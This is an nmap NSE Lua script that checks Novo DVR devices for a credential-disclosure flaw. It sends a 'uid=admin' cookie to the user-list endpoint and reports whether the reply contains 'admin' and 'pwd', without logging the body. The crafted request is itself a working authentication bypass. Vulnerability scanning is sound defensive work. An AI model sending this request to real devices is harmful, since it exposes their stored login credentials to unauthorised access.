PenetrationTestingScripts/nmap_scripts/Novo-credentials_disclosure...


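-- NSE library bindings. The `=` is required: `local http require "http"`
-- parses as a nil local followed by a bare require call, so every later use
-- such as `http.get` or `shortport.http` would index a nil value.
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

-- English summary of the description string below (the string itself is
-- runtime text shown by nmap and is left as the author wrote it):
--   "Novo DVR has a credential disclosure issue. A crafted link combined
--    with a modified cookie lets the requester view the login credentials
--    returned by the device."
description = [[
Desc:Novo DVR存在凭证泄露问题
攻击者精心构造链接,
修改cookie信息即可查看返回的登录凭证信息。
]]

author = "seaung"

-- NSE's script loader expects a categories table. "intrusive" keeps this
-- check out of safe-only scans, because the request presents a cookie the
-- scanner was never issued; "vuln" marks it as a vulnerability check.
-- NOTE(review): confirm the category choice against your scanning policy.
categories = {"vuln", "intrusive"}

-- Run against any port that NSE identifies as HTTP.
portrule = shortport.http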
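--- Reports whether the device's user-list endpoint answers a request that
-- carries only a client-chosen `uid=admin` cookie.
--
-- The verdict is a fixed string; the response body is never logged or
-- returned, so credentials the device may disclose do not end up in scan
-- output. Keep it that way when extending this check.
--
-- NOTE(review): the match is a plain substring test for "admin" and "pwd".
-- Any HTTP 200 page containing both words (for example a login form) is
-- reported as vulnerable, so a positive result should be confirmed manually
-- before it is acted on. Affected devices should have their management
-- interface restricted to trusted networks and their firmware updated.
--
-- @param host NSE host table, passed through to http.get.
-- @param port NSE port table, passed through to http.get.
-- @return "[+] Found vulnerable." or "[-] Not Found vulnerable." when the
--         server answered HTTP 200; nil when no usable response was received
--         (the original returned an empty output table in that case).
action = function(host, port)
  local url = "/device.rsp?opt=user&cmd=list"
  local options = { headers = { cookie = "uid=admin" } }

  local response = http.get(host, port, url, options)

  -- A failed or non-200 request says nothing about the device, so produce
  -- no script output instead of an empty result.
  if not response or response.status ~= 200 then
    return nil
  end

  -- A 200 reply may carry no body; string.find raises on nil, so treat a
  -- missing body as empty text.
  local body = response.body or ""

  -- Plain-text search (4th argument true): the needles are literals.
  local has_admin = string.find(body, "admin", 1, true) ~= nil
  local has_pwd = string.find(body, "pwd", 1, true) ~= nil

  if has_admin and has_pwd then
    stdnse.debug1("[+] found vulnerable.")
    return "[+] Found vulnerable."
  end

  stdnse.debug1("[-] not found vulnerable.")
  return "[-] Not Found vulnerable."
end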